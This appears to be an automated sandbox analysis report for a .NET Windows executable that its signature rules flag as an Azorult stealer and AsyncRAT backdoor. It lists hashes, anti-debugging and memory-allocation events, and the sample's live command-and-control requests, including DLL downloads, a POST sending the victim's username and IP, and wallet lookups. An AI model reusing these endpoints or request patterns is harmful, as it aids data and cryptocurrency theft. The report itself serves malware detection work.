Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 11, 2023, 10:27 a.m.	March 11, 2023, 10:31 a.m.

Size	600.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`628e9b3aa525960223fd93bae86b5e7d`
SHA256	`a050521e44bf504fe73e220798b66ce91259238fbcb1b04e206f5a78959e5aeb`
CRC32	`12EDA0AB`
ssdeep	`12288:nUG2pBoy4QQbDRfEk9Iz/rduerdgpjtDNzNpEsRkP7mHqx9bsejWgsWsHQb0Awwc:VuBoyw`
PDB Path	Cinoshi.pdb
Yara	Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) PE_Header_Zero - PE File Signature

faintxakers-76060706313.exe "C:\Users\test22\AppData\Local\Temp\faintxakers-76060706313.exe"
1676
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
ipwho.is	A 103.126.138.87	103.126.138.87
tryno.ru	A 172.67.175.222 A 104.21.83.128	172.67.175.222
anaida.evisyn.lol	A 172.67.149.91 A 104.21.41.183	172.67.149.91

IP Address	Status	Action
103.126.138.87	Active	Moloch
104.21.41.183	Active	Moloch
104.21.83.128	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49162 -> 104.21.83.128:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 104.21.41.183:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49168 -> 103.126.138.87:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 104.21.41.183:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:64894 -> 164.124.101.2:53	2037042	ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is)	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49162 104.21.83.128:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=*.tryno.ru	c7:33:d0:e4:57:0d:af:57:35:25:fd:20:cc:47:c3:65:d6:37:2d:f9
TLSv1 192.168.56.103:49164 104.21.41.183:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=*.evisyn.lol	0a:f6:16:98:f6:5d:6d:37:8d:82:fc:85:3b:7b:95:74:c4:59:7a:58
TLSv1 192.168.56.103:49168 103.126.138.87:443	C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA	CN=ipwho.is	2a:17:81:88:c8:d8:c5:73:0c:58:4d:b4:18:93:91:a6:93:ed:e9:f0
TLSv1 192.168.56.103:49174 104.21.41.183:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=*.evisyn.lol	0a:f6:16:98:f6:5d:6d:37:8d:82:fc:85:3b:7b:95:74:c4:59:7a:58

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW March 11, 2023, 10:27 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW March 11, 2023, 10:27 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 11, 2023, 10:27 a.m.			0	0
IsDebuggerPresent March 11, 2023, 10:27 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (12 events)

Time & API	Arguments	Status	Return
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00893f28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00893f28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00819e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00819f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00819f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00819f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008945a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008945a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008945a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00894728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00894768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00894768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

Cinoshi.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 11, 2023, 10:27 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	\x0bZr;I\x1a )
section

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 11, 2023, 10:27 a.m.	stacktrace: 0x796bd1 0x79545e DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f32652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73ff74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73ff7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74081dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74081e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74081f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7408416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745df5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 e1 3d 7e 67 c3 00 00 00 00 00 00 00 00 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb04cd50 registers.esp: 2093072 registers.edi: 0 registers.eax: 184864080 registers.ebp: 2093248 registers.edx: 37899048 registers.ebx: 2093492 registers.esi: 1593641491 registers.ecx: 0	1	0	0
__exception__ March 11, 2023, 10:27 a.m.	stacktrace: 0xb2ecb34 0x7954ca DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f32652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73ff74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73ff7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74081dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74081e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74081f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7408416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745df5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 c7 45 e8 00 00 00 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb2ecdf2 registers.esp: 2093208 registers.edi: 40514032 registers.eax: 0 registers.ebp: 2093244 registers.edx: 195 registers.ebx: 2093492 registers.esi: 40516820 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 11, 2023, 10:27 a.m.

stacktrace:

0x796bd1
0x79545e
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f4264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f42e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73ff74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73ff7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74081dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74081e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74081f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7408416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745df5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 e1 3d 7e 67 c3 00 00 00 00 00 00 00 00
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb04cd50
registers.esp: 2093072
registers.edi: 0
registers.eax: 184864080
registers.ebp: 2093248
registers.edx: 37899048
registers.ebx: 2093492
registers.esi: 1593641491
registers.ecx: 0

__exception__

March 11, 2023, 10:27 a.m.

stacktrace:

0xb2ecb34
0x7954ca
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f4264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f42e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73ff74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73ff7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74081dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74081e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74081f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7408416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745df5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 c7 45 e8 00 00 00
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb2ecdf2
registers.esp: 2093208
registers.edi: 40514032
registers.eax: 0
registers.ebp: 2093244
registers.edx: 195
registers.ebx: 2093492
registers.esi: 40516820
registers.ecx: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (15 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET https://tryno.ru/robots
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/Ionic.Zip.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/EntityFramework.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/EntityFramework.SqlServer.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/System.Data.SQLite.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/System.Data.SQLite.EF6.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/System.Data.SQLite.Linq.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/x86/SQLite.Interop.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/dlls/x64/SQLite.Interop.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://ipwho.is/?output=xml
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://anaida.evisyn.lol/c1n.php?ownerid=365&buildid=pisospro&countp=0&countc=0&username=test22&country=KR&ipaddr=175.208.134.152&BSSID=&countw=0
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/online.php?country=XX&ipaddr=0.0.0.0&HWID=&processorid=&ownerid=365
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol//list.php?id=365
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/getwallet.php?id=3651&wallet=nec
suspicious_features	GET method with no useragent header	suspicious_request	GET https://anaida.evisyn.lol/getwallet.php?id=365&wallet=dash

Performs some HTTP requests (15 events)

request	GET https://tryno.ru/robots
request	GET https://anaida.evisyn.lol/dlls/Ionic.Zip.dll
request	GET https://anaida.evisyn.lol/dlls/EntityFramework.dll
request	GET https://anaida.evisyn.lol/dlls/EntityFramework.SqlServer.dll
request	GET https://anaida.evisyn.lol/dlls/System.Data.SQLite.dll
request	GET https://anaida.evisyn.lol/dlls/System.Data.SQLite.EF6.dll
request	GET https://anaida.evisyn.lol/dlls/System.Data.SQLite.Linq.dll
request	GET https://anaida.evisyn.lol/dlls/x86/SQLite.Interop.dll
request	GET https://anaida.evisyn.lol/dlls/x64/SQLite.Interop.dll
request	GET https://ipwho.is/?output=xml
request	POST https://anaida.evisyn.lol/c1n.php?ownerid=365&buildid=pisospro&countp=0&countc=0&username=test22&country=KR&ipaddr=175.208.134.152&BSSID=&countw=0
request	GET https://anaida.evisyn.lol/online.php?country=XX&ipaddr=0.0.0.0&HWID=&processorid=&ownerid=365
request	GET https://anaida.evisyn.lol//list.php?id=365
request	GET https://anaida.evisyn.lol/getwallet.php?id=3651&wallet=nec
request	GET https://anaida.evisyn.lol/getwallet.php?id=365&wallet=dash

Sends data using the HTTP POST Method (1 event)

request

POST https://anaida.evisyn.lol/c1n.php?ownerid=365&buildid=pisospro&countp=0&countc=0&username=test22&country=KR&ipaddr=175.208.134.152&BSSID=&countw=0

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

tryno.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 88 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00472000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00791000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 163840 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00372000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00793000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00496000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00796000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00798000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00799000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0ac20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
